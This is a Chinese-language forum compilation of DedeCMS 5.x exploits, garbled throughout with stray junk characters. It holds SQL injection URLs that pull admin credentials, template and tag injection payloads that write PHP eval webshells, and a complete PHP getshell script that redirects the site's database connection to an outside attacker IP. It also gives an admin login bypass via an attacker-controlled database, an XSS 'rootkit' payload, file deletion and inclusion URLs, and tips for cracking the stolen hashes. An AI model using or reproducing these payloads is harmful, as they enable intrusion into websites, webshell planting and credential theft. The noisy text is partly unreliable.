|
|
) R$ \: Y9 F hDedecms 5.6 rss注入漏洞8 Y0 J4 L, l" {+ B# B7 [$ m0 l
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
9 e# |5 y( h9 s1 S d0 {# M
% G; \) H% O% X, _. a- c! P- ~6 j) d4 g4 \; r1 Y" J$ A
7 B; b, t- \: F; O* v/ @
* {5 W' |4 Y% _, Y F, u
0 o+ m r1 e p& ^" s% v" y, v2 O( i& W7 w4 c g
1 J. x" ^1 \, B3 s
+ I3 B" r' }* O; a- P( E6 C& k( V" l RDedeCms v5.6 嵌入恶意代码执行漏洞; `& h0 m7 ?; t9 V1 F, x8 y
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
* q" I( r+ s: R8 L0 \8 k发表后查看或修改即可执行
- i* p/ I4 I+ b! {, w! J( e& u' d0 Ka{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}& Z$ K& X( P) M
生成x.php 密码xiao,直接生成一句话。! m" ^% L( j& W+ k" O+ s5 X9 {: [# \
# _' @( i0 l1 ~: Z. D1 }5 Q
3 p8 g( `9 h+ N* Y
, L9 K. [( b5 R5 }& F" h w6 }
/ ~/ }# L$ V& M2 @! d# Y; U" K" p2 j r/ Y4 L; }) o# w, u3 g8 h
' l/ \$ N# V# x. r3 N; X6 A3 a. ~5 K
) q* r: `: ?% S, u* x; p
0 a7 p4 M* ^$ c) E1 g
Dede 5.6 GBK SQL注入漏洞8 c' C' C+ B7 `( U' ?' t, K
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
0 V0 U8 V% m0 }5 `* Hhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe) d4 L$ e8 u. f
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
9 _8 C3 X6 s A" D. ?7 Y( X" F7 r" h; i
$ Y; @8 P# n! r4 J2 O2 _) H" L
3 L9 U: p& J% t: N
9 p* `3 e8 y7 g- }7 s
/ {& S I; |: P: O" q I
9 j9 y6 L5 C7 N7 Y" J B: [. v; ^" j/ e9 O/ ?
$ b' U6 I F D4 |7 XDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
8 r% E; x+ g O; Dhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` v, b* k: V# s# x. z7 B
* J6 Z: e/ a6 S, a4 Q2 H! b5 w
' l2 U" }: w0 M8 W) Z& W, X7 C5 K/ I4 c* X( D
, P7 ~- |! k" K6 W+ O7 G5 ^
0 f) j! a7 u! _& l; U
3 w6 z5 m5 @# U0 O7 y6 h Q, KDEDECMS 全版本 gotopage变量XSS漏洞
6 h% z! I: Q# v$ G1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
3 D, Z, f# D0 g4 H- l2 Bhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="& \: b4 Y$ _4 q+ P
, X5 ^/ u# D# B0 U% |, j' P5 t" Y& K# o5 R; _$ p
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
: A% Y6 t9 M m; V7 w: G% |% jhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda/ z9 \0 p* V% d& t9 P
6 ^" w3 @' r& ^ d
5 C8 b4 q- W4 ^2 Y
http://v57.demo.dedecms.com/dede/login.php
8 g m5 C! E# r) F2 c$ c/ I5 N8 U9 T7 }+ K. j/ `. e8 Q9 r
5 q% e5 g1 p" y3 H
color=Red]DeDeCMS(织梦)变量覆盖getshell
" i [( [ D4 H) p$ X( e3 L#!usr/bin/php -w( \8 f* N0 t; E
<?php
$ u1 L( e% L9 v& N2 ierror_reporting(E_ERROR);1 N/ u T% c# K& E( I
set_time_limit(0);
( {7 J* h$ ?. `9 Q3 e, D# j8 Mprint_r('
# R) [+ K$ m6 t- e$ {# UDEDEcms Variable Coverage& E7 v* d# C! I: J
Exploit Author: www.heixiaozi.comwww.webvul.com
9 V# e2 _ q5 s) o3 d);
5 }* u' k2 U. h: w* t4 Recho "\r\n";
( {6 Z# \- N9 o1 \7 x- Iif($argv[2]==null){; t5 U: ]* h! B+ N( G& C# E
print_r('
" z9 O& b- T. W6 E# h$ S% |) w5 y' D+---------------------------------------------------------------------------+ i9 V) S% b/ o0 z2 M
Usage: php '.$argv[0].' url aid path
, U# @2 ?5 L- g& P# D- r) kaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/6 k6 m' d1 S l5 k/ l$ z/ S
Example:
# l5 E+ Q4 W, M9 [$ l( k1 v& ^, ]php '.$argv[0].' www.site.com 1 old
1 b5 Z& n0 n: | M+---------------------------------------------------------------------------+$ P/ K/ P4 _, ?- n8 n2 o) h
');% L* S* X: W/ ]2 V2 P0 f/ y
exit;
6 l( U) D# i& }# u, Q}
' h4 z, J: \0 F: u$ H2 z& M$url=$argv[1];
" @/ L0 P; t8 m* K% {/ F$aid=$argv[2];
/ A0 P5 I% b% F' o% y0 f$path=$argv[3];( g O# f% R+ R/ A7 z- ?
$exp=Getshell($url,$aid,$path);6 ~, @! [4 k* X7 [ b, L" ^
if (strpos($exp,"OK")>12){; A* U/ n" N; `, n, l2 b
echo "5 r' I0 k5 S2 g% |
Exploit Success \n";
" Y! x5 h% K, u: @. y2 sif($aid==1)echo "* m; L0 N% U' o
Shell:".$url."/$path/data/cache/fuck.php\n" ;4 w2 {9 i7 p2 X7 h( j. M5 \& ~& b# d. W
1 n# T5 H1 u0 b5 J2 r
# x. s0 z) j1 l6 N5 o9 @" n# D# A+ bif($aid==2)echo ". p) \& ?, H" Q& t: { E6 }! X
Shell:".$url."/$path/fuck.php\n" ;
( V6 w0 V" J4 r. \4 {- w" ] B1 L8 l- J' b
3 B8 L* c6 O9 `if($aid==3)echo ": H1 w: U1 p; N' [5 a. F. s
Shell:".$url."/$path/plus/fuck.php\n";. R. \, w$ ^) I) }
( w" k, ?* N# I' w
# X8 i: W$ ?3 W& L2 b9 x% m}else{8 p7 e' l9 n* P* D3 b
echo "
7 |2 {+ K1 {' J: _' ^" pExploit Failed \n";
9 x, ^4 x. _' E: j# {} T! S8 s& c$ B3 q7 q( H
function Getshell($url,$aid,$path){
% b' o; j6 ?( N8 r) I9 M) g$id=$aid;: o' k! [) g/ X8 A, K
$host=$url;& z& R* Z% P; ?
$port="80";
2 ]$ X+ \2 e9 v8 y" g3 `; p$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";1 b8 Q" a0 ~% v3 u. `8 C
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
/ P8 Y. ~- H. Z9 r( x$data .= "Host: ".$host."\r\n";
9 z9 `, g4 A" X! d6 c! s, p8 J$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
: J. \0 o; l, K$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
" R" Q; C6 v! Z/ u2 s1 y+ T- p+ \$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";* {/ {! g* D1 H& D8 b) F7 {8 T
//$data .= "Accept-Encoding: gzip,deflate\r\n";. ^% H5 ~9 M7 G# j8 P
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
. p3 R; U' E C# p3 H6 ]9 @) e$data .= "Connection: keep-alive\r\n";/ M4 i& w8 {8 H( j7 L8 f6 s
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
* m* }4 B7 s, _8 O$data .= "Content-Length: ".strlen($content)."\r\n\r\n";: K* P' n" N' H8 Z/ z4 d
$data .= $content."\r\n";1 ^% s# [0 ~) O8 E/ f
$ock=fsockopen($host,$port);
$ L/ y8 t1 L7 L3 ~5 \if (!$ock) {
! e; H3 K$ w4 h. s4 Hecho "8 [0 ^2 H$ ^1 `" e' O- w* Y' i
No response from ".$host."\n";
' s2 g( [9 u/ a' l% p" r}: Q& }9 {# z3 l3 D/ }
fwrite($ock,$data);
* C1 Y5 P4 j& b Xwhile (!feof($ock)) { ~; Z- J- t" ~1 K* X# p
$exp=fgets($ock, 1024);
" w6 Y+ h1 H3 o' \return $exp;
/ _$ {( e+ B( P* t p}
O2 O3 @3 x+ g' }9 b- _}, t) l# c! m, {! r$ Z
, Q" v3 _- a' _1 w) x6 a8 F' @
- S6 P3 w9 P: G+ G$ y5 \8 Z
?>
9 E ~5 A/ _; u3 b8 L: I% g, W3 W: ^" D7 z' z, o( k& g
( D8 a6 u" o& c& A% l
4 ^' m' v2 A' M; s
c$ M, q; P* [. S
5 i) C' u. z. g7 o
- q) ?% z' G* o- J. M/ b* e1 c6 T
! b' i4 `& E1 V- n" ~/ T1 W/ c4 k G5 \5 [; I# k1 U: s7 q
7 U4 O3 n2 p0 Z
2 ]4 u4 x( J5 ^- @6 rDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)% e1 V2 H6 Q1 a3 p+ H u
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root1 x: |( |6 r& Y9 B% n: B8 a
5 }4 z2 k1 t: X. I5 P4 E! V6 j0 ?( ~- ^9 X
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
( `' {5 t, s3 h
- F; k; ^4 _' y" z
3 s& F' d, v+ \% q% ^% Y8 b此漏洞的前提是必须得到后台路径才能实现 ?, ~/ u+ i' D2 E* @1 @& n' B2 ?
! I& U7 m0 ]* t2 T
6 k# M+ t$ r: c& c" V
: \+ I1 P/ v4 C$ I1 `! G- g& j1 [& i
% J& j' V' h% D% g8 F
1 r' F. ^& w7 T3 v* M0 X
a- v3 p1 f& |) y& @3 z) X, v* _4 P# a$ c! F! l8 m" o
4 M8 Q- m+ u( ?3 o3 H/ Y/ z2 x4 @' o$ n+ W# H1 t* n* [3 F/ m
Dedecms织梦 标签远程文件写入漏洞9 l7 b/ d, K3 W# a
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');) |+ t9 U0 Y7 X+ T& b
! f) i& C9 E2 Z
) J4 A: G3 P, b' }8 U' H3 [0 a
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 * s8 ~8 J" B$ [- k$ v/ n! b9 B
<form action="" method="post" name="QuickSearch" id="QuickSearch"># n6 J: i& [/ r8 O% s
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># R/ x9 m6 U* F/ T2 y
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
: _4 {8 _) l2 Z<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />4 ?$ ]3 Z. U+ ^$ ?3 p7 }0 ?; e
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />3 F2 p6 P# f9 D+ E' L+ U' F) Q# E
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
+ A- C6 N! q$ ^<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
7 ^: |" ?1 F# Q6 T1 C# k6 D<input type="text" value="true" name="nocache" style="width:400">
# l7 }1 x6 _8 V; a2 |* e<input type="submit" value="提交" name="QuickSearchBtn"><br />( m% V* {$ i- k; [' L2 V S: S
</form>) e, _5 n+ u3 q9 _( ~/ Z$ w; s: s
<script>
. V1 r; A4 |, X Z$ l: ifunction addaction()
% r3 }/ ?4 c* D( D7 G% O{ l$ X! Z z" O' X8 C
document.QuickSearch.action=document.QuickSearch.doaction.value;& y3 g3 ]. _- r3 e4 Q
}
2 j! A9 J+ X4 R1 T</script>8 ?! n; X2 w/ w8 U5 T& ~
0 e; [1 B# n0 n! Z5 _' q; z c! ^3 M1 B o0 K8 p8 R
6 O0 N y/ }" X; H
7 e Z) n: E3 E
k/ V5 v7 _( ?+ N
, B* a/ p& _: Y F% P, c4 G
6 r4 m! O- e/ @$ ^7 ~, n/ O* I+ ]/ r+ F3 d2 f
2 }# I, c+ I* V5 P" f
1 k1 S- H* |2 L, `) h) x( b# VDedeCms v5.6 嵌入恶意代码执行漏洞
" W P2 b s1 y6 C* m注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行2 e! z, [* d6 I- B. h5 m) b, g- |
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}& b- b; [- N0 f" B- o3 Z! E/ S
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
6 ^& R1 g( O# O4 S, F! e6 V) }* U& CDedecms <= V5.6 Final模板执行漏洞
?; z% e' h; `注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:3 V. B' N$ K8 {" B: O
uploads/userup/2/12OMX04-15A.jpg3 S6 U8 C* S6 G8 f6 X$ B
4 `6 n9 i6 N( k% j
F! G W3 V ^! u; t6 P模板内容是(如果限制图片格式,加gif89a):3 _$ j" M' X6 b; _3 k! [' U
{dede:name runphp='yes'}( p9 R0 G8 i* S
$fp = @fopen("1.php", 'a');5 _* |% Y% T. O; w, Y$ M7 Q
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");3 _7 m+ Z2 ]( L9 c
@fclose($fp);
( t, C. J0 k+ u% d, w$ h{/dede:name}" r7 `1 Z8 q1 D, V2 | @
2 修改刚刚发表的文章,查看源文件,构造一个表单:
" H: h, _, D5 c l# i<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">7 y8 r( I' c8 B9 @
<input type="hidden" name="dopost" value="save" />
8 @7 f7 v0 t1 N- L& d B/ l" N<input type="hidden" name="aid" value="2" />. Y% v2 a% N& f) P/ M) G1 @
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />, D0 d$ C4 P d
<input type="hidden" name="channelid" value="1" />
/ W' S$ z1 a- |<input type="hidden" name="oldlitpic" value="" />4 F! i# R0 ~/ c2 e
<input type="hidden" name="sortrank" value="1275972263" />
1 x6 g" h* F, \! M0 t/ {5 Y( X/ [ M! v( t" O
; f( c$ f7 i1 S6 j% t
<div id="mainCp">
2 f, P; Q% h% o/ o/ b, f<h3 class="meTitle"><strong>修改文章</strong></h3>
- C, o/ Z% L/ ?+ t& C% h+ g
( ?- @! C G! q
3 R$ N. J4 E/ g; k) M( D! s6 o. w: D<div class="postForm">
: _0 u8 P, c) y0 ]2 L# @<label>标题:</label>2 {3 Y% f$ R/ d0 F6 N8 Z
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
' c9 O B, f2 u* [. Z
) |7 @# e" O/ t+ ^& F" H- S& A4 b3 W7 v4 y( y3 }" u0 l
<label>标签TAG:</label>5 P" K2 A3 H: n
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
' F% s" ?% w H: N
: w8 K) H l/ m# _, `, w
- I# N1 J. J# X: u$ Q5 z% ]* p<label>作者:</label>
0 b1 e5 ]0 T+ C+ S9 a9 W<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
5 k) r$ U( t* ]6 R" E8 j# n8 T1 a/ \7 l5 T! g1 V) Z
5 K2 M9 s0 Q# m( L/ f" ?
<label>隶属栏目:</label>
) {8 i" g. s! }( Z5 G3 P<select name='typeid' size='1'>
; Z: }. ?% ^; p: F. f<option value='1' class='option3' selected=''>测试栏目</option>
/ V3 p' Q. c% q+ r9 U+ v* e. d</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
4 N) D) s& i0 D- R
- e; q1 \1 ^0 C5 D+ }5 F
' `( X! ]$ z0 ^* T$ F6 [! b<label>我的分类:</label>
; B/ y. t% ~9 @' L9 q7 W! j<select name='mtypesid' size='1'>. @9 c, h9 K9 b3 V
<option value='0' selected>请选择分类...</option>
& ~8 L0 _. _) m/ f* m<option value='1' class='option3' selected>hahahha</option>! Z4 x; \8 i: L3 E
</select>
% Z2 y! d' z) A+ c3 r0 @' q0 D" x/ }+ v) [5 a* n; S
/ g l# ?( y2 @! K4 y
<label>信息摘要:</label>- o& s, g# V4 b( g' X# I
<textarea name="description" id="description">1111111</textarea>
# F$ A. b( L* {' O# n" ?$ P. {; k/ h% e(内容的简要说明)
5 t! l% @2 g1 D+ x& P8 p
2 E# x w7 B' M, M% r! c
( U" S: u: D# `- r8 @% K<label>缩略图:</label>4 E; H; U. O# k1 d+ J2 l
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>; Y, e6 `- x* o& Y2 ]# q
9 t- l" o# t0 y Q4 h0 h
, n8 Y' o+ @! ?, T
<input type='text' name='templet'9 t- o7 ?+ ^ m8 j: S, x; A
value="../ uploads/userup/2/12OMX04-15A.jpg">
. N" ?; ^3 m5 @. o% F" E L<input type='text' name='dede_addonfields'
8 e$ I* x: l2 p# j- svalue="templet,htmltext;">(这里构造)0 V. u7 x% f7 |% \- I
</div>
3 E4 m, z J& \9 `; G6 D3 v, w2 k+ a
, h: H( }7 Y( A5 l<!-- 表单操作区域 -->, P9 z! ?9 P# ]6 y' f0 t
<h3 class="meTitle">详细内容</h3>
, Y" H/ q3 Y* s: Y; c7 `) x- e; O, Z) D) q9 T
. W) g6 B9 h2 @; ]# H<div class="contentShow postForm">5 k b* U8 N- B H+ c
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
* ^1 O! G5 b) _) o" @8 m0 q
, u$ t+ l8 C7 d' t/ \6 x) W! S P- U) C5 @% V
<label>验证码:</label>
& Y J+ B0 J7 S# t<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
2 w( O( T. i$ N. \; {# g2 r( F<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
) n2 k$ k! {: o: O& L; @% G" `( X4 w6 f/ t0 T) w4 z
% A. E" _ a a% W6 n
<button class="button2" type="submit">提交</button>5 C; \ y3 J( G! x
<button class="button2 ml10" type="reset">重置</button>9 {+ A3 e& y V& [
</div>. h) x1 \+ O8 u8 ]1 q- ~
) G0 w" l5 m3 ~6 `; b' Z8 P. _& ^& [- }" w( N. q' Y! ]
</div>: q; F5 Y( S" B e) O. e
X; B* ?, [/ G6 v2 O/ x& r" {$ G; g( o( I4 h
</form>
; m2 D* d" C% s$ i; A) j5 s( X [, @* a
1 q4 S3 [! ^. H# ]
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
, O: p5 J Y2 N) `/ y9 q假设刚刚修改的文章的aid为2,则我们只需要访问:) s: A7 p# @$ {! S& w$ H4 I
http://127.0.0.1/dede/plus/view.php?aid=28 i* Z" j4 ]1 } C8 i
即可以在plus目录下生成webshell:1.php, k8 [( d5 s( j2 R, T0 p
( ~2 ~4 Y( n& x! C* |) F* G
1 d/ |/ Z# ]+ U
, F8 u' k1 o' C5 d5 c) a2 ]9 N( h$ w7 m( y# S7 K+ o
0 @5 ~ L. H. q7 [; X8 `
& w0 h+ `" @2 y4 _1 ]2 h0 {2 J2 f$ i" Z% t: M/ }8 {; G
3 b3 }3 t; U* A: H v% L- Y3 F" K) u
0 R6 T6 r) W" r2 y+ r0 F5 U' a2 k$ u* G
q0 l( M' D3 n3 V& q+ M2 m0 I
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)4 o% R5 j& D: M. {3 m
Gif89a{dede:field name='toby57' runphp='yes'}+ G* }& W& V" B$ D; Q" E" ?
phpinfo();
9 y j. \. p2 ]4 s7 X# m7 u{/dede:field}
, K+ F+ w' l- N$ D/ f: |保存为1.gif
2 g- U% p$ u7 A& n4 R/ r2 [<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 3 M i/ x8 O# ]% ]3 j$ U8 V+ O6 u
<input type="hidden" name="aid" value="7" /> 9 u+ X. W0 Z; A' o8 O5 u. Q: Y
<input type="hidden" name="mediatype" value="1" />
! T0 }- G3 c$ R<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
* G1 }& I) ?& _<input type="hidden" name="dopost" value="save" /> 9 g+ W- L) ?; ?0 i3 s
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
2 H2 b. i+ \0 ]: I<input name="addonfile" type="file" id="addonfile"/>
0 g: N. N0 Q+ r) d3 K<button class="button2" type="submit" >更改</button> # O+ e5 g( s+ S
</form> 6 Y8 H. ?9 l- l1 _: f" c
, v9 E7 S; ~% g- Y
5 U) D4 e, {; M" k构造如上表单,上传后图片保存为/uploads/userup/3/1.gif. R' x9 }' x$ X2 p
发表文章,然后构造修改表单如下:7 y X9 R% b3 N6 t
. Q, h* l0 {% e. o& d% t0 | L- ?( H2 a
G' {0 u% S" _& c6 W2 o0 W
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ; ?/ g" n! |: [$ t8 l- t
<input type="hidden" name="dopost" value="save" />
- U" A, q6 `7 U N<input type="hidden" name="aid" value="2" /> * t t* r4 e2 c7 G* r
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> . y% G& J- y4 z7 Y
<input type="hidden" name="channelid" value="1" /> ) x( e$ N) A) y' B2 ~" p
<input type="hidden" name="oldlitpic" value="" /> : _4 C5 H |" T1 h1 D2 R& g
<input type="hidden" name="sortrank" value="1282049150" /> ' {2 y, H @" J, F; p
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> , f/ u D! p! L3 F4 j
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> , H2 K: E5 x# {6 j& N
<select name='typeid' size='1'>
. S( Q/ ^" C. D/ h" X<option value='1' class='option3' selected=''>Test</option> $ `' h6 e6 D1 Y: P/ q1 a
<select name='mtypesid' size='1'> # p( r) n; V6 p) ]0 [
<option value='0' selected>请选择分类...</option> 2 M& p! B7 r S# y$ C4 F
<option value='1' class='option3' selected>aa</option></select> 4 _' S; e3 J, l5 V n* W6 n* _
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ( c3 C: \: q7 i+ z$ f
<input type='hidden' name='dede_addonfields' value="templet">
( E# t& T2 v) N, {7 h$ N<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 5 O4 @) _. d. |$ E5 d
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 0 N9 ?1 a) a3 r& R2 _* v* l
<button class="button2" type="submit">提交</button>
! `4 P) _! i7 y# Z/ R</form>9 D* ]+ C) V* U e
4 n7 C0 j5 t! V! L$ w x( |6 o$ g9 g! m* w' G# X# I
) B; Y/ C- B6 W( j9 G- n
( h) S; @& z) {" j- u' \; C* a9 n$ k. o& o r& K8 M9 h- G) u
( v2 E( H: W1 A/ b& N) l; p+ l4 u1 ?! v1 i. c. ]0 G& U1 E
+ P/ p% W4 D1 R) k% Y! @7 x2 r
1 ?) ]7 c4 p6 G0 q d+ @
. N% C: c$ e- V" w* I4 C3 Q0 `( K2 W
' Y) m9 Q* n2 j- H v) J3 s7 B1 G$ |# s. `$ G, X
织梦(Dedecms)V5.6 远程文件删除漏洞
/ A7 Q4 i8 [0 c( l; U, ehttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
- j. ]3 c& M5 m) ?! { o2 c
7 ~. L6 W5 k$ m& _2 d
( w# E4 l, o c& m+ a0 e
5 R6 l% X5 l9 T$ j4 ^% v
9 _7 f9 @: U( ]' ]/ r& n; G
7 e) l8 }9 g6 @0 [+ _ Q* ^- u ]8 Q. [, W; }( t ?
2 E- N* n) C5 ~3 F2 b' r0 u; l5 W5 a
8 C8 N4 a7 e2 ]7 q2 G4 t' J$ Z$ z, r- R
# B3 g% a, ]8 f0 t' F织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 ) N5 b' x6 }2 l' t, g! W
http://www.test.com/plus/carbuya ... urn&code=../../
! Z, o/ Q! x/ z/ R, d4 Q. ^2 C7 ~
/ f J# b. I R& C
) I/ B ?# g4 m7 z& v; {, j1 T8 ]
- T: s" A9 j( h% H X' g; E& k# p7 V6 S8 @. E$ i
% m! ~5 h5 R" C2 l% g6 z" H
% E3 M6 E6 h$ ~+ h
0 d# Q# F* B( a b. c$ g$ j9 U+ f% L4 A# H, B
+ u2 {* L0 L+ l( t! rDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 3 M# h( `' [$ L$ I+ T) y+ P3 N8 B* X! j
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`% O5 c6 y, L' T, }+ b
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5$ e7 B3 o2 {0 p& Y# g( ^) c
9 }$ z; Y3 p0 g7 D
$ o4 B% @# f1 k" }1 ] N
& J+ ]& y( T" L+ l5 f
: ~3 w4 N5 } [7 |, C. P- T
1 G2 H: c- v: x- @2 g% |( r6 d }
% x C. g* N7 Z1 \) [, v2 \6 A: e7 y! o' ^ g
( t! v; O! R2 S% z
I' p# q1 C) H# P4 {+ @4 r: c+ f3 d) a; F2 q4 \& x
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞4 q0 {6 T+ u. K* u
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='$ l& u! [0 x( ?* g
- z% i. u) N0 L: t
" r j4 j* ^; P( F+ Z& C6 l) _. R) d
, i. F3 S* Q1 B3 C
. J# G" U* o/ j) t$ m9 Z w/ v
8 W. c9 U c, Y( u3 D% B4 j$ \- M% c* O. f) x! c. |: Q, e
3 i7 f0 U2 J# C7 ]7 r' Y
) o/ \: g3 j4 ^
& A* ^* b6 w+ N3 _9 [" q1 U# q织梦(Dedecms)select_soft_post.php页面变量未初始漏洞; v# q8 L. p2 ~) x( Y: L* n, W |! q
<html>
